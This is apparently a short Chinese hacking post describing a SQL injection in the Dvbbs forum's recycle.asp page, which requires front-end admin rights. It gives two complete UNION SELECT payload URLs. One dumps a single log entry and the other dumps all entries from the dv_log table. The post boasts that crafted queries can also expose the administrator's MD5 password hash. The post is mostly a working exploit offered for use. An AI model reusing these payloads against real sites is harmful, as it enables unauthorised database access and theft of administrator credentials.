注:需要獲得前臺管理員權(quán)限后使用 

文章中指定recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000（回收站的最后頁的id），指變換l_id=‘’的值來暴出l_concent的值一次只能暴一個內(nèi)容，看了下動網(wǎng)的數(shù)據(jù)庫表，只要指定l_announceid=0就可以全部暴出，語句這樣構(gòu)造recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_announceid=0%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000嘿嘿，是不是全部暴出來了，構(gòu)造適當(dāng)?shù)恼Z句可以暴出管理員的后臺md5值等等內(nèi)容。另注：暴出數(shù)據(jù)字段的內(nèi)容是回收站帖子的最后頁！ 

最新評論